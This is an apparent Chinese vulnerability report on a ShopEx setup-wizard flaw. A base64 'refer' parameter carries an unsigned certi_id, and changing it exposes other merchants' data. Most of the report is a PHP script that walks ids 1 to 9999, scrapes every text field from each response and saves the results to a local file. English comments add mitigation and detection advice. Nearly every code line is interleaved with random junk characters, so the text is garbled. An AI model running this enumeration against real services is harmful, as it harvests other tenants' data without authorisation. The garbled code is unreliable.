|
简要描述:
ShopEx 某接口缺陷，可遍历所有网站
详细说明:
问题出现在 ShopEx 网店使用向导页面：

http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=

refer 参数 base64 解码后为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}

我们修改 certi_id 即可遍历所有使用了 ShopEx 程序的网站。
! D0 o7 t0 }) p+ L. r( R, B<?php
0 M# |5 `: a0 B& G+ y" V
// Driver: calls the probe below for certificate ids 1..9999 in order, one
// HTTP request per id, with no delay or error handling between calls.
// Defender note: a single client walking step2.php with consecutive
// certi_id values is the traffic pattern to alert on for this issue.
+ a" n6 \, f2 p8 @' H3 F. X4 U for ($i=1; $i < 10000; $i++) { //enumerate
J- G" j8 J+ C& c
/ B; `. K: C9 {4 T, K' A2 B2 Q ShowshopExD($i);9 y* D% t0 I, h$ _9 k$ G! |
* q$ F' u1 [5 v' @- Y/ C: Z
}
, E% X; M. U; ? Q" O+ K7 G2 q0 I* ^1 J- S3 m" n8 c
/**
 * Proof-of-concept probe for one ShopEx wizard certificate id.
 *
 * Builds the step2.php guide URL with a base64-encoded JSON refer blob whose
 * certi_id is $cid and whose callback_url is a fixed dummy value, fetches the
 * page with curl and, when the response contains that refer string, scrapes
 * the name/value pair of every input type=text element to stdout and appends
 * it to c:/shopEx.txt.
 *
 * Security reading (defender side): the decoded refer shown in the report
 * carries only certi_id and callback_url, i.e. the server trusts a
 * client-supplied id with no signature, nonce or session binding visible in
 * the request. That makes certi_id an unprotected direct object reference,
 * so a sequential scan exposes every tenant's wizard data. Mitigation: issue
 * refer as an opaque server-side token (or HMAC-sign the blob) bound to the
 * authenticated merchant, and never render another tenant's values.
 * Detection: many step2.php hits from one source with sequential certi_id
 * and an identical callback_url.
 *
 * @param int|string $cid certificate id to probe; passed through intval()
 * @return void results go to stdout and c:/shopEx.txt; nothing is returned
 */
function ShowshopExD($cid) {
/ Y! N* D. F& d( P
// Wizard step page being probed.
( l" D* k8 O' ~* ^9 q- I% Z $url='http://guide.ecos.shopex.cn/step2.php';
7 Q4 z: p. T4 n: l( b' N9 S' g3 _& ~7 Q7 h1 s8 B! n; {/ }
// refer = base64(JSON); certi_id is the probed id, callback_url is a
// placeholder domain that the server does not appear to validate.
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');* |3 W& }/ q8 V+ ]
2 w+ Y& o1 B# v7 o2 N $url = $url.'?refer='.$refer;' F: g- l" H& _$ ]
4 P3 { B$ g% v& u% ?( V6 Y2 d- K
// Plain GET; RETURNTRANSFER makes curl_exec hand back the body as a string
// instead of echoing it. The return value (false on failure) is not checked.
$ch = curl_init($url);
* ]3 _8 L3 t- s8 I. P/ [
' ?. Z( v+ d+ q7 o. r1 t2 D, i curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
% G; r; m8 d7 J' p* O' D" ~2 q9 m4 @7 P. [: a
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;6 K7 I0 F, n4 s4 P0 M+ X% q) o
- v/ A, s- d" |6 x
$result = curl_exec($ch);
1 r: c2 ]1 ]- c v5 y, {" p1 Z2 \ e" P& z- }' H3 O' ?2 S( M( ~
// Re-encode the UTF-8 body as gb2312, presumably for a Chinese Windows
// console; the output file written below inherits that encoding.
$result = mb_convert_encoding($result, "gb2312", "UTF-8");
# v! X4 Y/ V+ t# \! o0 ^
// A response counts as a hit only when the refer blob is found in it
// (presumably reflected into the page); everything else is skipped silently.
; h0 W5 D& x( w- H6 }$ v if(strpos($result,$refer))
& z6 ~4 @/ q$ x; o. u' B9 j
& h9 ?0 W" j4 k* c {
; b/ y% j |; H+ y( g( [+ n2 @/ c1 ?) {$ ^5 s7 v
// Append mode: one output file accumulates every hit of the scan.
// fopen's return value is not checked.
$fp = fopen("c:/shopEx.txt",'ab'); //save to file
' z5 h N4 W- _0 G- L) G4 R. F
// $value[1] holds the attribute text of each input type=text element.
8 o) I# l3 T- U: j& F preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
5 z+ T/ P; z& s4 N, E, x' s; j4 | [) G8 w
foreach ($value[1] as $key) {
% M/ m6 l0 _; s
// $res[1][0] is the name attribute, $res[3][0] the value attribute;
// each field is emitted as name:value on its own line.
N% _5 P+ Y$ a8 P preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);: }) y# u6 i9 U
2 Q& U$ `0 \4 W echo $res[1][0].':'.$res[3][0]."\r\n";# @. B; Y4 L, n. P$ u! ^
2 o) B' F; N1 D7 ]! n F- k: M# G$ W1 E
$col =$res[1][0].':'.$res[3][0]."\r\n"; - J2 m2 B/ o, g1 T9 ]
// strlen gives the byte length, which is what fwrite expects.
$ e8 w8 Y3 A9 e* p+ U4 x! Y! }7 w fwrite($fp, $col, strlen($col)); + u# H! [) X/ O- w& O. D. B
0 k/ p n1 g2 K, o
}7 W9 I- U5 M* R: d% {; L
, q" A8 ]# ^; D0 C1 C& I
// Separator between hits on stdout only; not written to the file.
echo '--------------------------------'."\r\n";
6 r* ^9 c2 i/ |, R' d/ x( {5 z/ {5 e S+ O: C7 T/ A
fclose($fp);
/ J6 M( F9 R+ C3 T. U/ ~$ F. i* e" B: B Q3 i$ w; R
}
7 R7 H. K x" ^! F" {+ }& |" O7 U; a# C7 a, Q- y- \3 G/ Q0 E1 p1 _& u4 J
// Push buffered output so progress is visible per id; the curl handle is
// created and closed once per call.
flush();9 }" } h- [: c6 c
; p* R8 C4 B# N- n. T3 i curl_close($ch);
' w/ y9 R6 r( y2 `% A2 G/ Z
- w; e' m' A3 X6 g4 s }
4 V! S9 c' J4 i& i! \2 V0 K$ q# M; y0 p: c/ `
?>- X8 V. b1 ~' c1 N
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg

refer 换成其他加密方式
|